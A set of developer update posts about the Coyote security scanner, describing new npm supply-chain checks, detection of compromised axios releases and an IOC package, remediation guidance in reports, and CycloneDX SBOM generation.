Coyote Security Scanner

Just pushed a new update to Coyote as NPM-focused supply chain attacks seem to be on the rise. Here's the details on what was added: - npm-specific supply chain detection added to Coyote’s core scanner. - New checks catch suspicious install-time lifecycle scripts like risky preinstall/postinstall behavior. - The scanner now flags remote dependency sources in package.json, insecure .npmrc settings, and Node lockfiles that use plain HTTP or lack integrity hashes. - Wired the new findings into scoring, attack path analysis, and test coverage so they affect real risk evaluation.

Done ✅ New update to Coyote that adds a scan for the axios/npm supply-chain attack, details below 🔽 - add dedicated dependency findings for: - compromised releases `[email protected]` and `[email protected]` - IOC package `plain-crypto-js` - include incident metadata, install-time execution context, and remediation guidance in dependency findings - ensure supply-chain IOC findings still fail CI under `--deps-reachable-only` since this campaign executed at install time - map new rule names into supply-chain attack-path analysis - add tests for malicious axios releases, IOC package detection, gate behavior, and attack-path categorization - update README dependency scan docs with Axios incident coverage

Just pushed a new update to Coyote Security to Github, and working on a second one now as the axios/npm supply-chain-attack is a big deal, and a perfect place to use Coyote. First, here's the update I just pushed that I'm pretty excited about, adding a core feature ppl have been asking for. feat(remediation): add actionable remediation guidance to findings and reports Add remediation text across the finding pipeline so scan output is not just descriptive, but also tells users what to do next. - extend PatternMatch with a remediation field - add remediation text to all secret and smell patterns - add sensitive-file remediation lookup helper - populate remediation in scanner findings for sensitive files, secrets, smells, entropy hits, gitignore issues, and large files - add upgrade/monitor remediation for dependency vulnerability findings - include remediation in JSON, Markdown, HTML, and SARIF outputs - add remediation-focused tests covering patterns, reports, SARIF, and sensitive file behavior Validation: - python3 -m unittest tests.test_remediation Now live on Github.

Just pushed a new update to Coyote, now live on GH. Here's what's new: Coyote can now generate CycloneDX v1.5 Software Bill of Materials from your dependency lockfiles. One command gives you a compliance-ready inventory across Python, npm, Go, and Rust projects. - Supports requirements.txt, poetry.lock, package-lock.json, pnpm-lock.yaml, go.mod, and Cargo.lock - Generates spec-compliant PURLs for every component with proper ecosystem normalization - Dev dependencies excluded by default — opt in with --include-dev - For a full supply chain security workflowPairs with existingcoyote depsandcoyote gate